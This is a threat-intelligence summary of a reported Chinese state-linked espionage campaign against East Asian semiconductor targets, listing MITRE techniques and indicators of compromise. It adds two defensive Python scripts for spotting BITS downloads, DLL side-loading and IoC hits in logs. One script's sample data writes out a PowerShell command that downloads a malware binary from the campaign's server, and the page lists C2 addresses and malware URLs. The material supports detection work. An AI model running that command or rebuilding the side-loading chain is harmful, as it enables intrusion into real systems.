EclecticIQ identifies a Chinese state-sponsored cyber-espionage campaign targeting East Asia's semiconductor sector, using a HyperBro loader with DLL side-loading, a Cobra DocGuard-hosted downloader, and a Go-based backdoor named ChargeWeapon to exfiltrate data and maintain persistence. The operation shows strong overlaps with PRC-backed threat activity and employs signed binaries, Cobalt Strike, and social engineering lures aimed at Mandarin-speaking regions around Taiwan, Hong Kong, and Singapore.
#HyperBro #ChargeWeapon #CobraDocGuard #RedHotel #APT27 #Budworm #CobaltStrike #TSMC
Keypoints
- Campaign targets Mandarin-speaking East Asia semiconductor interests (Taiwan, Hong Kong, Singapore) using a TSMC-themed lure.
- HyperBro loader runs a Cobalt Strike beacon in memory via DLL side-loading using a signed CyberArk binary (vfhost.exe).
- A second-stage downloader on Cobra DocGuard server fetches Cobalt Strike payloads and loads them via DLL side-loading.
- The Cobra DocGuard server hosts ChargeWeapon, a Go-based backdoor that collects host data and reports to a C2 server.
- Decoy PDF lures in Mandarin aim to minimize user suspicion while malware executes in the background.
- Attribution links to PRC-backed groups (e.g., RedHotel/APT27/Budworm) and shared infrastructure with Hong Kong targets.
MITRE Techniques
- [T1574.002] DLL Side-Loading - DLL side-loading attacks use the DLL search order mechanism in Windows to plant and invoke a legitimate application that executes a malicious DLL payload. Quote: “…DLL side-loading attacks use the DLL search order mechanism in Windows to plant and invoke a legitimate application that executes a malicious DLL payload…”
- [T1105] Ingress Tool Transfer - The BitsTransfer module in PowerShell is used to fetch malicious binaries from a Cobra DocGuard server. Quote: “This downloader utilizes the BitsTransfer module in PowerShell to fetch malicious binaries from a very likely compromised Cobra DocGuard server.”
- [T1059.001] PowerShell - PowerShell-based download and execution workflow observed, including the Start-BitsTransfer usage. Quote: “The PowerShell command line execution after the successful infection of the Cobalt Strike downloader: Start-BitsTransfer -Source …”
- [T1071.001] Web Protocols - The Cobalt Strike beacon uses a C2 profile and disguises traffic (Malleable C2) to resemble normal web traffic. Quote: “A Malleable C2 profile specifies how the beacon will transform and store data in a transaction to its C2 server. This technique is used for evasion of traditional firewall defenses.”
- [T1140] Deobfuscate/Decode Files or Information - The XOR-encrypted payload is decrypted with a one-byte key (0x01). Quote: “The shellcode decryption routine uses a one-byte length key (0x01) to decrypt the XOR-encrypted Cobalt Strike payload.”
- [T1036.005] Masquerading - The threat actor masquerades components as legitimate binaries (e.g., securityhealthservice.exe, vfhost.exe). Quote: “Masqueraded names included securityhealthservice.exe, secu.exe, vfhost.exe, vxhost.exe, vx.exe, and v.exe.”
- [T1047] Windows Management Instrumentation - WMI-based execution is used for lateral movement or execution. Quote: “Windows Management Instrumentation (WMI) execution.”
- [T1566.001] Phishing: Spearphishing Attachment - A decoy PDF themed around Taiwan Semiconductor Manufacturing is used to lure victims. Quote: “The threat actor used a TSMC-themed PDF as a decoy, displayed after the execution of the HyperBro loader.”
- [T1036.005] Masquerading - Reiterated for the tactic of disguising as legitimate software in distributed components. Quote: “Masquerading: Match Legitimate Name or Location - T1036.005”
- [T1140] Deobfuscate/Decode Files or Information - Reiterated in the appendix for the XOR-based decryption of shellcode. Quote: “The decryption routine uses a one-byte length key (0x01) to decrypt the XOR-encrypted Cobalt Strike payload.”
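Two of the behaviours above are directly detectable from endpoint telemetry: a PowerShell process invoking Start-BitsTransfer against an IP-literal or plain-HTTP source (T1105/T1059.001), and one of the masqueraded process names from the report loading a DLL from a directory where a signed vendor binary would never normally live (T1574.002/T1036.005). The script below is an added example written for this page, not code from EclecticIQ or from the report; the event dictionaries are a constructed, Sysmon-like subset (ProcessCreate with a command line, ImageLoad with the loading image and the loaded DLL), the trusted-directory list and the `updates.example.com` / `Vendor` paths are assumptions, and the masqueraded names and the downloader URL are taken from the report.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlparse

# Process names the report lists as masquerading as legitimate binaries.
MASQUERADED_NAMES = {
    "securityhealthservice.exe", "secu.exe", "vfhost.exe",
    "vxhost.exe", "vx.exe", "v.exe",
}

# Assumed allow-list of directories a signed binary is expected to load DLLs from.
# A DLL loaded from anywhere else by a masqueraded process is a side-loading candidate.
TRUSTED_DLL_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)

# Captures the -Source argument of Start-BitsTransfer anywhere in a command line.
BITS_SOURCE_RE = re.compile(
    r"start-bitstransfer\b.*?-source\s+['\"]?([^\s'\"]+)", re.IGNORECASE
)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_bits_download(cmdline):
    """T1105 / T1059.001: BITS transfer from PowerShell to an IP literal or plain HTTP."""
    m = BITS_SOURCE_RE.search(cmdline)
    if not m:
        return None
    url = m.group(1)
    parsed = urlparse(url)
    host = parsed.hostname or ""
    try:
        ip_address(host)
        ip_literal = True
    except ValueError:
        ip_literal = False
    if ip_literal or parsed.scheme.lower() == "http":
        return {"technique": "T1105", "reason": "Start-BitsTransfer from suspicious source", "url": url}
    return None


def check_side_load(image, loaded_dll):
    """T1574.002 / T1036.005: masqueraded process loading a DLL outside trusted directories."""
    if basename(image) not in MASQUERADED_NAMES:
        return None
    if loaded_dll.lower().startswith(TRUSTED_DLL_DIRS):
        return None
    return {"technique": "T1574.002", "reason": "masqueraded binary loading DLL from untrusted directory",
            "image": image, "dll": loaded_dll}


def triage(events):
    """Run both checks over a list of constructed Sysmon-like events and return the findings."""
    findings = []
    for ev in events:
        finding = None
        if ev["event"] == "ProcessCreate" and basename(ev["image"]) in ("powershell.exe", "pwsh.exe"):
            finding = check_bits_download(ev["cmdline"])
        elif ev["event"] == "ImageLoad":
            finding = check_side_load(ev["image"], ev["loaded"])
        if finding:
            findings.append(finding)
    return findings


# Constructed sample telemetry: two PowerShell launches and three image loads.
SAMPLE_EVENTS = [
    {"event": "ProcessCreate", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": 'powershell.exe -Command "Start-BitsTransfer -Source '
                'http://154.93.7.99:8090/CDGServer3/images/zh/mcods.exe -Destination C:\\Users\\Public\\mcods.exe"'},
    {"event": "ProcessCreate", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": 'powershell.exe -Command "Start-BitsTransfer -Source '
                'https://updates.example.com/tools/agent.msi -Destination C:\\Temp\\agent.msi"'},
    {"event": "ImageLoad", "image": "C:\\Users\\Public\\vfhost.exe", "loaded": "C:\\Users\\Public\\mcvsocfg.dll"},
    {"event": "ImageLoad", "image": "C:\\Windows\\System32\\svchost.exe", "loaded": "C:\\Windows\\System32\\kernel32.dll"},
    {"event": "ImageLoad", "image": "C:\\Program Files\\Vendor\\vfhost.exe", "loaded": "C:\\Program Files\\Vendor\\helper.dll"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f)
```

Only the download to the IP-literal HTTP URL and the user-writable `vfhost.exe` loading a neighbouring DLL are reported; the HTTPS download to a hostname and the same binary name under Program Files pass, which keeps the rule usable against normal software-update traffic. The Cobalt Strike beacon itself, once running in memory, leaves no further file-based trace, so the image-load event is the last reliable host-side signal before network indicators take over.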
Indicators of Compromise
- [Hash] 12e1f50d7c9cf546c90545588bc369fa90e03f2370883e7befd87e4d50ebf0df - HyperBro loader variant artifact
- [Hash] 7229bb62acc6feca55d05b82d2221be1ab0656431953012ebad7226adc63643b - secondary loader/downloader artifact
- [Hash] df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348 - downloader/artifact component
- [Hash] 45e7ce7b539bfb4f780c33faa1dff523463907ec793ff5d1e94204a8a6a00ab5 - Cobalt Strike shellcode artifact
- [Hash] 56f94f1df0338d254d0421e7baf17527817607a60c6f9c71108e60a12d7d6dcf - additional loader/downloader artifact
- [IP] 38.54.119.239 - C2 IP for HyperBro/Cobalt Strike beacon
- [IP] 45.77.37.145 - C2 IP for ChargeWeapon Go backdoor
- [IP] 45.32.33.17 - Additional C2-related host IP
- [IP] 23.224.61.12 - Secondary C2-related host IP
- [IP] 154.93.7.99 - Cobra DocGuard server hosting downloader components
- [URL] hxxp://38.54.119.239:443/jquery-3.3.1.min.js - Malleable C2 disguise payload
- [URL] hxxp://154.93.7.99:8090/CDGServer3/images/zh/mcvsocfg.dll - Cobra DocGuard downloader component
- [URL] hxxp://154.93.7.99:8090/CDGServer3/images/zh/mcods.exe - Cobra DocGuard downloader component
- [URL] hxxp://154.93.7.99:8090/CDGServer3/images/zh/bin.config - Cobalt Strike shellcode config
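The indicator list above is in the `[type] value - description` shape most reports use, with URLs defanged (`hxxp://`). The script below is an added example written for this page, not EclecticIQ tooling: it parses that shape, refangs the URLs, and sweeps proxy, firewall and EDR log lines for hits, matching IPs on token boundaries (so 45.32.33.17 does not fire on 45.32.33.170) and hashes case-insensitively. The IoC text is a subset copied from the list above; the log lines and the hostnames and timestamps in them are constructed.

```python
import re

# Subset of the report's indicators, in the same [type] value - description shape as the list above.
IOC_TEXT = """
[Hash] 12e1f50d7c9cf546c90545588bc369fa90e03f2370883e7befd87e4d50ebf0df - HyperBro loader variant artifact
[IP] 38.54.119.239 - C2 IP for HyperBro/Cobalt Strike beacon
[IP] 45.32.33.17 - Additional C2-related host IP
[IP] 154.93.7.99 - Cobra DocGuard server hosting downloader components
[URL] hxxp://154.93.7.99:8090/CDGServer3/images/zh/mcvsocfg.dll - Cobra DocGuard downloader component
[URL] hxxp://154.93.7.99:8090/CDGServer3/images/zh/bin.config - Cobalt Strike shellcode config
"""

IOC_LINE_RE = re.compile(r"^\[(Hash|IP|URL)\]\s+(\S+)\s+-\s+(.*)$")


def refang(value):
    """Undo the usual defanging conventions so indicators compare against real log content."""
    return (value.replace("hxxps://", "https://")
                 .replace("hxxp://", "http://")
                 .replace("[.]", "."))


def parse_iocs(text):
    """Return (type, normalized value, description) tuples from the report-style list."""
    iocs = []
    for raw in text.strip().splitlines():
        m = IOC_LINE_RE.match(raw.strip())
        if not m:
            continue  # skip headings or malformed lines rather than fail the whole sweep
        kind, value, desc = m.groups()
        value = refang(value)
        if kind == "Hash":
            value = value.lower()
        iocs.append((kind, value, desc))
    return iocs


def _pattern(kind, value):
    """Compile a boundary-aware regex for one indicator."""
    esc = re.escape(value)
    if kind == "IP":
        # no digit or dot on either side: 45.32.33.17 must not match 45.32.33.170 or 145.32.33.17
        return re.compile(r"(?<![\d.])" + esc + r"(?![\d.])")
    if kind == "Hash":
        return re.compile(r"(?<![0-9a-f])" + esc + r"(?![0-9a-f])", re.IGNORECASE)
    return re.compile(esc, re.IGNORECASE)  # URL: literal, case-insensitive


def scan_logs(log_lines, iocs):
    """Return one hit dict per (line, indicator) pair found in the log lines."""
    compiled = [(kind, value, desc, _pattern(kind, value)) for kind, value, desc in iocs]
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        normalized = refang(line)  # some log pipelines defang URLs on ingest
        for kind, value, desc, pat in compiled:
            if pat.search(normalized):
                hits.append({"line": lineno, "type": kind, "ioc": value, "description": desc})
    return hits


# Constructed sample log lines: one proxy record, two firewall records and one EDR file event.
SAMPLE_LOGS = [
    '2024-01-01T10:00:00Z proxy src=10.0.0.5 url="http://154.93.7.99:8090/CDGServer3/images/zh/bin.config" status=200',
    '2024-01-01T10:00:03Z fw src=10.0.0.5 dst=45.32.33.170 dport=443 action=allow',
    '2024-01-01T10:00:07Z edr host=WS01 file=C:\\Users\\Public\\v.exe '
    'sha256=12E1F50D7C9CF546C90545588BC369FA90E03F2370883E7BEFD87E4D50EBF0DF',
    '2024-01-01T10:00:09Z fw src=10.0.0.5 dst=38.54.119.239 dport=443 action=allow',
]

if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS, parse_iocs(IOC_TEXT)):
        print(hit)
```

The proxy line produces two hits (the Cobra DocGuard IP and the full bin.config URL), the second firewall line produces none because 45.32.33.170 is a different host, and the uppercase SHA-256 from the EDR still matches. Keeping the IP match boundary-aware matters most for the `[IP]` entries here, several of which share prefixes with large hosting ranges.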